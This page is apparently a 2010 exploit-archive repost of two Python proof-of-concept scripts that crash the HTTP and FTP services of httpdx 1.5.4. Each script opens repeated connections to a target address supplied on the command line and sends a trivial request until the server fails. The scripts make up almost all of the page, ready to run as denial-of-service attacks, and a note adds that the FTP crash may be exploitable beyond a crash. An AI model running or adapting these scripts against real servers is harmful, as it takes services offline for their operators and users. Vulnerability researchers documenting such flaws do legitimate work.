首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Httpdx 1.5.4 Multiple Denial of Service Vulnerabilities (http-ftp) PoC
来源:vfocus.net 作者:Dr_IDE 发布时间:2010-08-19  

#!/usr/bin/env python

###########################################################################
#
# Title:  httpdx v1.5.4 Remote HTTP Server DoS (0day)
# By:  Dr_IDE
# Tested: XPSP3
# Download: http://httpdx.sourceforge.net
# Note:  Server will totally crash if only running the EXE
# Note:  Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may not be exploitable as it dumps on a read operation.
# Upon crash throws: Access violation when reading [00001238]
#
############################################################################

import socket, sys

payload = ("GET / HTTP/1.1\r\n\r\n");
x=1;

try:
 while (x < 2048):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  print ("[*] Connecting to httpdx server.");
  s.connect((sys.argv[1], 80));
  print ("\n[*] Sending command.\n");
  s.send(payload);
  s.close();
  x = x+1;

except:
 print ("[*] Success! We crashed the server in %d attempts." % x);
 print ("[i] [pocoftheday.blogspot.com]");


=====================================================================================

#!/usr/bin/env python

###########################################################################
#
# Title:  httpdx v1.5.4 Remote FTP Server DoS (0day)
# By:  Dr_IDE
# Tested: XPSP3
# Download: http://httpdx.sourceforge.net
# Note:  Server will totally crash if only running the EXE
# Note:  Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may be exploitable as it dumps on a write operation.
# Upon crash throws: Access violation when writing to [00230000]
#
############################################################################

import socket, sys

payload = ("USER anonymous\r\n\r\n");
x=1;

try:
 while (x < 2048):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  print ("[*] Connecting to httpdx server.");
  s.connect((sys.argv[1], 21));
  print ("\n[*] Sending command.\n");
  s.send(payload);
  s.close();
  x = x+1;

except:
 print ("[*] Success! We crashed the server in %d attempts." % x);
 print ("[i] [pocoftheday.blogspot.com]");

 

 
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·A-PDF WAV to MP3 v1.0.0 Univer
·Open-Realty 2.5.7 Local File D
·VbsEdit v4.6.1.0 Denial of Ser
·RockN Wav Editor 1.8 Denial of
·Webedition 6.0.0.8 (Search.php
·SOMPL Music Player v1.0 (.m3u)
·Vural Portal 2010 Remote Datab
·Triologic Media Player 8 (.m3u
·SonicWALL E-Class SSL-VPN Acti
·A-PDF WAV to MP3 Converter 1.0
·FreeBSD mbufs() sendfile Cache
·Triologic Media Player 8 (.m3u
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved